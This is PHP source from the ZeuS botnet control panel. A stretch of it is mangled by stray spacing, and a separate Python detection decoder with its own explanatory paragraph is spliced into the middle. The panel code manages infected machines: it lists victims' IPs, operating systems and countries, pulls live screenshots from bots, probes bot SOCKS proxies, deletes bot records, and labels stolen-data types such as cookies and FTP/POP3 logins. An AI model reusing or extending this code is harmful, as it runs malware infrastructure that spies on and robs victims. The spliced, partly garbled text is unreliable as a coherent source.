$ Bedit = empty ($ _USER_DATA ['r_edit_bots'])? 0: 1; $ Ba =! Empty ($ _GET ['botsaction'])? $ _GET ['Botsaction']: $ _POST ['botsaction'];

$ Blist =! Empty ($ _POST ['bots']) & & is_array ($ _POST ['bots'])? $ _POST ['Bots']: $ _GET ['bots'];

$ Blist = array_unique ($ blist);

/ / Check whether the right of action.

$ Deny = true; foreach ($ _BOT_MENU as $ item) if ($ item [0]! == 0 & & strcmp ($ item [0], $ ba) === 0) {$ deny = false; break;}

if ($ deny) ThemeFatalError (LNG_ACCESS_DEFINED);

/ / Is a list of bots to MySQL.

$ Sql_blist ='';

$ Count = 0;

foreach ($ blist as $ bot) $ sql_blist .= ($ count + + == 0?'': 'OR'). "bot_id = '". addslashes ($ bot )."'";

if (strcmp ($ ba, 'fullinfo') === 0 | | strcmp ($ ba, 'fullinfoss') === 0) {

/ / Mode updatings.

if ($ bedit & & isset ($ _GET ['save']) & & (isset ($ _POST ['used']) & & is_array ($ _POST ['used'])) & & (isset ($ _POST ['comments'] ) & & is_array ($ _POST ['comments'])))

{

$ Q =''; foreach ($ blist as $ i => $ bot) if (isset ($ _POST ['used'] [$ i]) & & isset ($ _POST ['comments'] [$ i]))

{

@ Mysql_query ("UPDATE botnet_list SET flag_used ='".($_ POST ['used'] [$ i] == 1? 1: 0 )."', comments = '". Addslashes (substr ($ _POST [' comments '] [$ i], 0, 250 ))."' WHERE bot_id =' ". addslashes ($ bot)." 'LIMIT 1 ");

$ Q .= '& bots []='. urlencode ($ bot);

}

header ('Location:'. QUERY_SCRIPT. '? botsaction ='. urlencode ($ ba). $ q);

die (); }

/ / Screenshot. if (strcmp ($ ba, 'fullinfoss') === 0 & & isset ($ _GET ['ipv4']) & & isset ($ _GET ['port']))

{

$ Format = 'image /'.$_ USER_DATA [' ss_format ']; $ Data = 0;

if (($ sock = @ fsockopen ($ _GET ['ipv4'], $ _GET ['port'], $ errn, $ errs, 5))) {

@ Stream_set_timeout ($ sock, 5);

@ Fwrite ($ sock, pack ('LLL', 10, strlen ($ format) + 4, $ _USER_DATA ['ss_quality']).$ format); @ Fflush ($ sock);

if (($ fs = @ fread ($ sock, 8)) & & ($ fs = @ unpack ('L2', $ fs)))

{

while ($ data <$ fs [1] & &! @ feof ($ sock)) {

$ Need = min ($ fs [2], $ fs [1] - $ data);

if (! ($ td = @ fread ($ sock, $ need))) break;

$ Sm = strlen ($ td);

while ($ sm <$ need & &! @ feof ($ sock) & & ($ td2 = @ fread ($ sock, $ need-$ sm ))){$ sm + = strlen ($ td2); $ td .= $

td2;} if ($ data == 0) header ('Content-Type:'. $ format);

$ Data + = $ sm;

echo $ td; if (! @ fwrite ($ sock, pack ('L', $ fs [2]))) break;

@ Fflush ($ sock);

} }

@ Fclose ($ sock);

}


if ($ data === 0) {

header ('Content-Type: image / png');

echo file_get_contents (THEME_PATH. '/ failed.png'); }

die ();

}

/ / Stdout.

if (! ($ r = @ mysql_query ('SELECT *, IF (rtime_last> = \''. ONLINE_TIME_MIN.' \ ', 1, 0) AS is_online FROM botnet_list WHERE'. $ sql_blist))) ThemeMySQLError ();

/ / Get the result. $ Res = array ();

while (($ m = @ mysql_fetch_assoc ($ r))) $ res [$ m ['bot_id']] = $ m;

mysql_free_result ($ r); unset ($ m);

/ / Display the result.

$ E_count = 0;

$ Data ='';

if ($ bedit) $ data .= str_replace (array ('{NAME}', '{URL}', '{JS_EVENTS}'), array ('edit', QUERY_SCRIPT_HTML. '? botsaction ='. $ ba. ' & save = 1 ',''), THEME_FORMPOST_BEGIN);

$ Data .=

str_replace ('{WIDTH}', '90% ', THEME_DIALOG_BEGIN). str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (1, LNG_BA_FULLINFO_TITLE), THEME_DIALOG_TITLE).

THEME_DIALOG_ROW_BEGIN.

str_replace ('{COLUMNS_COUNT}', 1, THEME_DIALOG_ITEM_CHILD_BEGIN);

foreach ($ blist as $ bot)

{ $ Data .=

str_replace ('{WIDTH}', '100% ', THEME_LIST_BEGIN).

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_BOTID), THEME_LIST_ITEM_LTEXT_U1).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', BotPopupMenu ($ bot, 'botmenu')),

THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END;

/ / Background. $ Is_exists = isset ($ res [$ bot]);

if (! $ is_exists) $ data .= THEME_LIST_ROW_BEGIN.str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (2,

LNG_BA_FULLINFO_EMPTY), THEME_LIST_ITEM_EMPTY_1). THEME_LIST_ROW_END; else

{

$ E_count + +; $ L = $ res [$ bot];

$ Data .=

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_BOTNET),

THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['botnet'])), THEME_LIST_ITEM_LTEXT_U2).

THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_VERSION),

THEME_LIST_ITEM_LTEXT_U1).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', IntToVersion ($ l ['bot_version'])),

THEME_LIST_ITEM_LTEXT_U1).

THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_OS), THEME_LIST_ITEM_LTEXT_U2).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', OSDataToString ($ l ['os_version'])),

THEME_LIST_ITEM_LTEXT_U2). THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN.

str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_OSLANG), THEME_LIST_ITEM_LTEXT_U1).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['language_id'])),

THEME_LIST_ITEM_LTEXT_U1).

      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_TIMEBIAS), THEME_LIST_ITEM_LTEXT_U2).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', TimeBiasToText($l['time_localbias'])), THEME_LIST_ITEM_LTEXT_U2).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_COUNTRY), THEME_LIST_ITEM_LTEXT_U1).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($l['country'])), THEME_LIST_ITEM_LTEXT_U1).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_IPV4), THEME_LIST_ITEM_LTEXT_U2).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($l['ipv4']).($l['flag_nat'] ? '*' : '')), THEME_LIST_ITEM_LTEXT_U2).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_LATENCY), THEME_LIST_ITEM_LTEXT_U1).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', number_format_as_float($l['net_latency'] / 1000, 3)), THEME_LIST_ITEM_LTEXT_U1).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_PORT_S1), THEME_LIST_ITEM_LTEXT_U2).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($l['port_s1'])), THEME_LIST_ITEM_LTEXT_U2).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_TFIRST), THEME_LIST_ITEM_LTEXT_U1).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex(gmdate(LNG_FORMAT_DT, $l['rtime_first']))), THEME_LIST_ITEM_LTEXT_U1).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_TLAST), THEME_LIST_ITEM_LTEXT_U2).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex(gmdate(LNG_FORMAT_DT, $l['rtime_last']))), THEME_LIST_ITEM_LTEXT_U2).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_TONLINE), THEME_LIST_ITEM_LTEXT_U1).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $l['is_online'] == 1 ? TickCountToTime(CURRENT_TIME - $l['rtime_online']) : LNG_FORMAT_NOTIME), THEME_LIST_ITEM_LTEXT_U1).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_INSTALL), THEME_LIST_ITEM_LTEXT_U2).
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $l['flag_install'] == 1 ? LNG_YES : LNG_NO), THEME_LIST_ITEM_LTEXT_U2).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_USED), THEME_LIST_ITEM_LTEXT_U1).
      ($bedit ?
        str_replace(array('{NAME}', '{WIDTH}'), array('used[]', 'auto'), THEME_LIST_ITEM_LISTBOX_U1_BEGIN).
        str_replace(array('{VALUE}', '{TEXT}'), array(0, LNG_NO), $l['flag_used'] != 1 ? THEME_LIST_ITEM_LISTBOX_ITEM_CUR : THEME_LIST_ITEM_LISTBOX_ITEM).
        str_replace(array('{VALUE}', '{TEXT}'), array(1, LNG_YES), $l['flag_used'] == 1 ? THEME_LIST_ITEM_LISTBOX_ITEM_CUR : THEME_LIST_ITEM_LISTBOX_ITEM).
        THEME_LIST_ITEM_LISTBOX_U1_END
       :
        str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $l['flag_used'] == 1 ? LNG_YES : LNG_NO), THEME_LIST_ITEM_LTEXT_U1)
      ).
      THEME_LIST_ROW_END.

      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_COMMENTS), THEME_LIST_ITEM_LTEXT_U2).
      ($bedit ?

        str_replace(array('{NAME}', '{VALUE}', '{MAX}', '{WIDTH}'), array('comments[]', htmlentities_ex($l['comments']), 250, '99%'), THEME_LIST_ITEM_INPUT_TEXT_U2)
       :
        str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($l['comments']) ? '-' : htmlentities_ex($l['comments'])), THEME_LIST_ITEM_LTEXT_U2)
      ).
      THEME_LIST_ROW_END;

    if (strcmp($ba, 'fullinfoss') === 0)
    {
      $ss = str_replace('{URL}', htmlentities_ex(QUERY_SCRIPT.'?botsaction=fullinfoss&bots[]=0&ipv4='.urlencode($l['ipv4']).'&port='.urlencode($l['port_s1'])), THEME_SCREENSHOT);
      $data .=
        THEME_LIST_ROW_BEGIN.
        str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_SCREENSHOT), THEME_LIST_ITEM_LTEXT_U1).
        str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $ss), THEME_LIST_ITEM_LTEXT_U1).
        THEME_LIST_ROW_END;
    }
  }

  //Ending.
  $data .= THEME_LIST_END.($bedit && $is_exists ? str_replace(array('{NAME}', '{VALUE}'), array('bots[]', htmlentities_ex($bot)), THEME_FORM_VALUE) : '').THEME_VSPACE;
}

$data .=
  THEME_DIALOG_ITEM_CHILD_END.
  THEME_DIALOG_ROW_END;

if ($bedit && $e_count > 0)
{
  $data .=
    str_replace('{COLUMNS_COUNT}', 1, THEME_DIALOG_ACTIONLIST_BEGIN).
    str_replace(array('{TEXT}', '{JS_EVENTS}'), array(LNG_BA_FULLINFO_ACTION_SAVE, ''), THEME_DIALOG_ITEM_ACTION_SUBMIT).
    THEME_DIALOG_ACTIONLIST_END;
}

$data .=
  THEME_DIALOG_END.($bedit ? THEME_FORMPOST_END : '');

ThemeSmall(LNG_BA_FULLINFO_TITLE, $data, 0, GetBotJSMenu('botmenu'), 0);
}
else if (strcmp($ba, 'today_dbreports') === 0 || strcmp($ba, 'week_dbreports') === 0)
{
  $date2 = gmdate('ymd', CURRENT_TIME);
  $date1 = strcmp($ba, 'week_dbreports') === 0 ? gmdate('ymd', CURRENT_TIME - 518400) : $date2;
  foreach ($blist as $k => $v) if (spacechars_exists($v)) $blist[$k] = '"'.$v.'"';
  header('Location: '.QUERY_STRING_BLANK.'reports_db&date1='.urlencode($date1).'&date2='.urlencode($date2).'&bots='.urlencode(implode(' ', $blist)).'&q=');
  die();
}
else if (strcmp($ba, 'files') === 0)
{
  foreach ($blist as $k => $v) if (spacechars_exists($v)) $blist[$k] = '"'.$v.'"';
  header('Location: '.QUERY_STRING_BLANK.'reports_files&bots='.urlencode(implode(' ', $blist)).'&q=');
  die();
}
else if (strcmp($ba, 'remove') === 0 || strcmp($ba, 'removeex') === 0) //Rights are not checked here, because the check already happens when $_BOT_MENU is built.
{

  if (isset($_GET['yes']) || isset($_GET['no']))
  {
    $data =
      str_replace('{WIDTH}', 'auto', THEME_LIST_BEGIN).
      str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, LNG_BA_REMOVE_TITLE), THEME_LIST_TITLE);

    if (isset($_GET['yes']))
    {
      //Remove from botnet_list.
      if (@mysql_query('DELETE FROM botnet_list WHERE '.$sql_blist)) $t = str_replace('{TEXT}', sprintf(LNG_BA_REMOVE_REMOVED, @mysql_affected_rows()), THEME_STRING_SUCCESS);
      else $t = str_replace('{TEXT}', mysql_error_ex(), THEME_STRING_ERROR);

      $data .= THEME_LIST_ROW_BEGIN.
        str_replace(array('{WIDTH}', '{TEXT}'), array('auto', 'botnet_list'), THEME_LIST_ITEM_LTEXT_U1).
        str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $t), THEME_LIST_ITEM_LTEXT_U1).
        THEME_LIST_ROW_END;

      //Remove.
      if (strcmp($ba, 'removeex') === 0)
      {
        $i = 1;
        $rlist = ListReportTables(MYSQL_DB);

        //Remove from botnet_reports_*.
        foreach ($rlist as $table)
        {
          if (@mysql_query("DELETE FROM {$table} WHERE ".$sql_blist)) $t = str_replace('{TEXT}', sprintf(LNG_BA_REMOVE_REMOVED, @mysql_affected_rows()), THEME_STRING_SUCCESS);
          else $t = str_replace('{TEXT}', mysql_error_ex(), THEME_STRING_ERROR);

          $item = ($i % 2 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1);
          $data .= THEME_LIST_ROW_BEGIN.
            str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($table)), $item).
            str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $t), $item).
            THEME_LIST_ROW_END;
          $i++;
        }

        //Delete files.
        $root = getdirs(REPORTS_PATH);
        if ($root !== false) foreach ($root as $rdir)
        {
          $rdir = REPORTS_PATH.'/'.$rdir;
          $botnets = getdirs($rdir);

          if ($botnets !== false) foreach ($botnets as $botnet)
          {
            $botnet = $rdir.'/'.$botnet;
            $bots = getdirs($botnet);

            if ($bots !== false) foreach ($bots as $bot)
            {
              $bot_l = mb_strtolower(urldecode($bot));
              $bot = $botnet.'/'.$bot;

              foreach ($blist as $l)
              {
                if (strcmp($bot_l, mb_strtolower($l)) === 0)
                {
                  if (ClearPath($bot)) $t = str_replace('{TEXT}', LNG_BA_REMOVE_FREMOVED, THEME_STRING_SUCCESS);
                  else $t = str_replace('{TEXT}', LNG_BA_REMOVE_FERROR, THEME_STRING_ERROR);

                  $item = ($i % 2 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1);
                  $data .=

                    THEME_LIST_ROW_BEGIN.
                    str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($bot)), $item).
                    str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $t), $item).
                    THEME_LIST_ROW_END;
                  $i++;
                }
              }
            }
            unset($bots);
          }
          unset($botnets);
        }
        unset($root);
      }
    }
    else $data .= THEME_LIST_ROW_BEGIN.str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_BA_REMOVE_ABORTED), THEME_LIST_ITEM_LTEXT_U1).THEME_LIST_ROW_END;

    ThemeSmall(LNG_BA_REMOVE_TITLE, $data.THEME_LIST_END, 0, 0, 0);
  }
  else
  {
    $bl = '';
    foreach ($blist as $bot) $bl .= '&bots[]='.addjsslashes(urlencode($bot));
    $q = sprintf(strcmp($ba, 'remove') === 0 ? LNG_BA_REMOVE_Q1 : LNG_BA_REMOVE_Q2, count($blist));
    $js = "function qr(){var r = confirm('".addjsslashes($q)."') ? 'yes' : 'no'; window.location = '".addjsslashes(QUERY_SCRIPT)."?botsaction={$ba}{$bl}&' + r;}";
    ThemeSmall(LNG_BA_REMOVE_TITLE, '', $js, 0, 'onload="qr()"');
  }
}
else if (strcmp($ba, 'port_socks') === 0)
{
  //Check the socks.
  if (isset($_GET['ipv4']) && isset($_GET['port']))
  {
    $ok = 0;
    if (($s = @fsockopen($_GET['ipv4'], $_GET['port'], $errn, $errs, 5)))
    {
      @stream_set_timeout($s, 5);
      $data = pack('CCSL', 4, 1, 0, 0)."\0"; //Socks4 header.
      if (@fwrite($s, $data) && ($data = @fread($s, 8)) && strlen($data) == 8) $ok = 1;
      fclose($s);
    }

    if ($ok == 1) echo str_replace('{TEXT}', LNG_BA_PORT_SOCKS_SUCCESS, THEME_STRING_SUCCESS);
    else echo str_replace('{TEXT}', LNG_BA_PORT_SOCKS_FAILED, THEME_STRING_ERROR);
    die();
  }

  //Display the list.
  if (!($r = @mysql_query('SELECT bot_id, country, ipv4, port_s1 FROM botnet_list WHERE '.$sql_blist))) ThemeMySQLError();

  //Get the result.
  $res = array();
  while (($m = @mysql_fetch_row($r))) $res[$m[0]] = $m;
  mysql_free_result($r);
  unset($m);

  $data =
    str_replace('{WIDTH}', 'auto', THEME_LIST_BEGIN).
    str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(3, LNG_BA_PORT_SOCKS_TITLE), THEME_LIST_TITLE);
  $i = 0;
  $jslist = '';

  //Display the result.

  foreach ($blist as $bot)
  {
    $is_exists = isset($res[$bot]);
    $item = ((($i++) % 2 == 0) ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2);

    if ($is_exists)
    {
      $l = $res[$bot];
      $jslist .= ($jslist == '' ? '' : ',')."['st{$i}', '".addjsslashes(urlencode($l[2]))."', '".addjsslashes(urlencode($l[3]))."']";
    }

    $data .=
      THEME_LIST_ROW_BEGIN.
      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', BotPopupMenu($bot, 'botmenu').'/'.($is_exists ? $l[1] : '-')), $item).
      str_replace(array('{WIDTH}', '{TEXT}'), array('150px', $is_exists ? htmlentities_ex($l[2].':'.$l[3]) : '-:-'), $item).
      str_replace(array('{WIDTH}', '{TEXT}'), array('150px',
        $is_exists ? str_replace('{ID}', 'st'.$i, THEME_STRING_ID_BEGIN).LNG_BA_PORT_SOCKS_CHECKING.THEME_STRING_ID_END : LNG_BA_PORT_SOCKS_FAILED
      ), $item).
      THEME_LIST_ROW_END;
  }

  //Script for checking the proxies.
  $ajax_err = addjsslashes(str_replace('{TEXT}', LNG_BA_PORT_SOCKS_ERROR, THEME_STRING_ERROR));
  $ajax_init = JSXMLHttpRequest('sockshttp');
  $q = addjsslashes(QUERY_SCRIPT.'?botsaction=port_socks&bots[]=0');
  $ajax = <<<JS_SCRIPT
var sockslist = [{$jslist}];
var sockshttp = false;

function StateChange(i)
{
  if (sockshttp.readyState == 4)
  {
    var el = document.getElementById(sockslist[i][0]);
    if (sockshttp.status == 200 && sockshttp.responseText.length > 5) el.innerHTML = sockshttp.responseText;
    else el.innerHTML = '{$ajax_err}';
    SocksCheck(++i);
  }
}

function SocksCheck(i)
{
  if (sockshttp) delete sockshttp;
  if (i < sockslist.length)
  {
    {$ajax_init}
    if (sockshttp)
    {
      sockshttp.onreadystatechange = function(){StateChange(i)};
      sockshttp.open('GET', '{$q}&ipv4=' + sockslist[i][1] + '&port=' + sockslist[i][2], true);
      sockshttp.send(null);
    }
  }
}
JS_SCRIPT;

  ThemeSmall(LNG_BA_PORT_SOCKS_TITLE, $data.THEME_LIST_END, $ajax, GetBotJSMenu('botmenu'), 'onload="SocksCheck(0);"');
}
else if (strcmp($ba, 'newscript') === 0)
{
  foreach ($blist as $k => $v) if (spacechars_exists($v)) $blist[$k] = '"'.$v.'"';
  header('Location: '.QUERY_STRING_BLANK.'botnet_scripts&new=-1&bots='.urlencode(implode(' ', $blist)));
  die();
}

die();
}
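The screenshot request at the top of this section and the SOCKS4 probe in the port_socks branch are the two raw TCP exchanges the panel opens toward a bot, and both have a fixed framing that network detection can key on. The following Python decoder is an added example, not part of the ZeuS panel source: it recognises either framing in a captured client-to-bot payload, splits a screenshot reply into its (total size, chunk size) header and image bytes, and counts the per-chunk acknowledgements the panel writes back. It assumes PHP's machine-order pack('L') and pack('S') produced little-endian values (x86 panel host); all sample payloads are constructed.

```python
"""Decoders for the two raw TCP probes the control script sends to a bot:
  - screenshot request: pack('LLL', 10, strlen(format)+4, quality) . format
  - SOCKS4 liveness probe: pack('CCSL', 4, 1, 0, 0) . "\\0"
Added example for classifying captured payloads; not part of the ZeuS panel
source.  Assumes PHP's machine-order pack('L'/'S') produced little-endian
values, i.e. an x86 panel host."""
import struct
from typing import Optional

SCREENSHOT_CMD = 10                            # first dword of a screenshot request
SOCKS4_PROBE = b"\x04\x01" + b"\x00" * 7       # VN=4, CD=1, port=0, ip=0, empty user id


def parse_screenshot_request(payload: bytes) -> Optional[dict]:
    """Return {'quality', 'format'} if payload is a panel screenshot request, else None."""
    if len(payload) < 12:
        return None
    cmd, length, quality = struct.unpack("<III", payload[:12])
    fmt = payload[12:]
    # The panel sets the length field to strlen(format) + 4 and sends 'image/<ss_format>'.
    if cmd != SCREENSHOT_CMD or length != len(fmt) + 4 or not fmt.startswith(b"image/"):
        return None
    return {"quality": quality, "format": fmt.decode("ascii", "replace")}


def parse_screenshot_reply(stream: bytes) -> Optional[tuple]:
    """Split the bot side of the exchange: unpack('L2') header = (total size,
    chunk size), followed by the image bytes.  Returns (total, chunk, image)
    or None if the header is short or the chunk size is zero (the panel loop
    would read nothing and stop)."""
    if len(stream) < 8:
        return None
    total, chunk = struct.unpack("<II", stream[:8])
    if chunk == 0:
        return None
    return total, chunk, stream[8:8 + total]


def acks_for(total: int, chunk: int) -> int:
    """Number of pack('L', chunk) acknowledgements the panel writes back while
    pulling one image of `total` bytes in `chunk`-sized reads."""
    return (total + chunk - 1) // chunk if total and chunk else 0


def is_socks4_probe(payload: bytes) -> bool:
    """True for the exact 9-byte SOCKS4 CONNECT-to-0.0.0.0:0 probe from port_socks."""
    return payload == SOCKS4_PROBE


def classify(payload: bytes) -> str:
    """Label a client-to-bot TCP payload for detection logging."""
    if is_socks4_probe(payload):
        return "zeus-panel-socks4-probe"
    if parse_screenshot_request(payload) is not None:
        return "zeus-panel-screenshot-request"
    return "unknown"


# Constructed sample payloads (not captured traffic).
SAMPLE_SS_REQ = struct.pack("<III", SCREENSHOT_CMD, len(b"image/png") + 4, 75) + b"image/png"
SAMPLE_SS_REPLY = struct.pack("<II", 10, 4) + b"\x89PNG\r\n\x1a\n\x00\x00"

if __name__ == "__main__":
    print(classify(SAMPLE_SS_REQ), parse_screenshot_request(SAMPLE_SS_REQ))
    print(classify(SOCKS4_PROBE))
    print(parse_screenshot_reply(SAMPLE_SS_REPLY), acks_for(10, 4))
```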

////////////////////////////////////////////////////////////////////////////////
//Start the module.
////////////////////////////////////////////////////////////////////////////////

//Select the module name and remove unneeded menu items.
$needed_module = (empty($_GET[QUERY_VAR_MODULE]) ? '' : $_GET[QUERY_VAR_MODULE]);
$curmodule = '';
OptimizeMenu($_MAINMENU, true);
foreach ($_MAINMENU as $key => $item) if ($item[0] !== 0 && (strcmp($needed_module, $item[0]) === 0 || $curmodule == '')) $curmodule = $item[0];
if ($curmodule == '') die('Modules for current user not defined.');

define('CURRENT_MODULE', $curmodule); //The current module.
define('FORM_CURRENT_MODULE', str_replace(array('{NAME}', '{VALUE}'), array('m', $curmodule), THEME_FORM_VALUE)); //Current module parameter for forms.
define('QUERY_STRING', QUERY_STRING_BLANK.CURRENT_MODULE); //Query string for the current module.
define('QUERY_STRING_HTML', QUERY_STRING_BLANK_HTML.CURRENT_MODULE); //Query string for the current module in HTML format.
unset($needed_module, $curmodule);

//Load the language module.
if (!file_exists('system/'.CURRENT_MODULE.'.lng.'.$_USER_DATA['language'].'.php')) $_USER_DATA['language'] = DEFAULT_LANGUAGE;
require_once('system/'.CURRENT_MODULE.'.lng.'.$_USER_DATA['language'].'.php');

//Start the module.
require_once('system/'.CURRENT_MODULE.'.php');
die();

////////////////////////////////////////////////////////////////////////////////
//Functions.
////////////////////////////////////////////////////////////////////////////////

/*
  Get the MySQL error formatted as HTML with a prefix.

  Return - string, the MySQL error.
*/
function mysql_error_ex()
{
  return 'MySQL error: '.htmlentities_ex(mysql_error());
}

/*
  Create a temporary file.

  IN $prefix - string, file prefix.

  Return - mixed, the new temporary file name, or false on failure.
*/
function CreateTempFile($prefix)
{
  @mkdir('tmp', 0777);
  return @tempnam('tmp', $prefix);
}

/*
  Add headers for downloading data as a file.

  IN $name - string, the final file name.
  IN $size - size of the file.
*/
function HTTPDownloadHeaders($name, $size)
{
  header('Content-Type: application/octet-stream');
  header('Content-Disposition: attachment; filename='.basename_ex($name));
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.$size);
  HTTPNoCacheHeaders();

}

/*
  Convert BLT_* to a string.

  IN $type - int, BLT_* to convert.

  Return - string, the string representation of BLT_*.
*/
function BltToLng($type)
{
  switch ($type)
  {
    case BLT_PROTECTED_STORAGE:   return LNG_BLT_PROTECTED_STORAGE;
    case BLT_COOKIES_IE:          return LNG_BLT_COOKIES_IE;
    case BLT_FILE:                return LNG_BLT_FILE;
    case BLT_HTTP_REQUEST:        return LNG_BLT_HTTP_REQUEST;
    case BLT_HTTPS_REQUEST:       return LNG_BLT_HTTPS_REQUEST;
    case BLT_LOGIN_FTP:           return LNG_BLT_LOGIN_FTP;
    case BLT_LOGIN_POP3:          return LNG_BLT_LOGIN_POP3;
    case BLT_GRABBED_UI:          return LNG_BLT_GRABBED_UI;
    case BLT_GRABBED_HTTP:        return LNG_BLT_GRABBED_HTTP;
    case BLT_GRABBED_WSOCKET:     return LNG_BLT_GRABBED_WSOCKET;
    case BLT_GRABBED_FTPSOFTWARE: return LNG_BLT_GRABBED_FTPSOFTWARE;
    case BLT_GRABBED_OTHER:       return LNG_BLT_GRABBED_OTHER;
  }
  return LNG_BLT_UNKNOWN;
}

/*
  fnmatch substitute for Windows.

  IN $pattern - string, mask.
  IN $string  - string, the string.

  Return - bool, true on a match, otherwise false.
*/
if (!function_exists('fnmatch'))
{
  function fnmatch($pattern, $string)
  {
    return @preg_match('#^'.strtr(preg_quote($pattern, '#'), array('\\*' => '.*', '\\?' => '.?')).'$#i', $string);
  }
}

/*
  Determines whether the string contains whitespace.

  IN $str - string, the string to check.

  Return - true if whitespace is present, false if it is not.
*/
function spacechars_exists($str)
{
  return strpbrk($str, "\x20\x09\x0A\x0B\x0D") === false ? false : true;
}

/*
  Transform a logical expression into an array.

  IN $exp - string, expression.

  Return - array, the result.
*/
function ExpToArray($exp)
{
  $list = array();
  $len  = strlen($exp);

  for ($i = 0; $i < $len; $i++)
  {
    $cur = ord($exp[$i]);

    //Skip whitespace characters.
    if ($cur == 0x20 || ($cur >= 0x9 && $cur <= 0xD)) continue;

    //Check for quotes.
    if ($cur == 0x22 || $cur == 0x27)
    {
      for ($j = $i + 1; $j < $len; $j++) if (ord($exp[$j]) == $cur)
      {
        //Count the number of backslashes.
        $c = 0;
        for ($k = $j - 1; ord($exp[$k]) == 0x5C; $k--) $c++;
        if ($c % 2 == 0) break; //With an even number of backslashes before the quote, the quote is not an escaped character.
      }
      if ($j != $len) $i++; //If the end was not reached, drop the opening quote.
      $type = 1;
    }
    //Simple copy up to the first space.
    else
    {
      for ($j = $i + 1; $j < $len; $j++)
      {
        $cur = ord($exp[$j]);
        if ($cur == 0x20 || ($cur >= 0x9 && $cur <= 0xD)) break;
      }
      $type = 0;
    }

    $list[] = array(substr($exp, $i, $j - $i), $type);
    $i = $j;
  }

  return $list;
}

/*
  Compare a string against a logical expression.

  IN $str    - string, the string.
  IN $exp    - string, expression.
  IN $cs     - bool, if true the comparison is case-sensitive (BINARY), otherwise insensitive.
  IN $strong - bool, see the code.

  Return - true if the string satisfies the expression, false otherwise.
*/
function MatchStringInExpString($str, $exp, $cs, $strong)
{
  $exp = trim($exp);
  if ($exp == '' || $exp == '*') return true;
  $list = ExpToArray($exp);

  //Set up pcre.
  $pcre_pre = ($strong ? '#^' : '#');
  $pcre_aft = ($strong ? '$#' : '#').($cs ? 'u' : 'iu');

  //Process the result.
  $q_prev = $q_cur = 0;
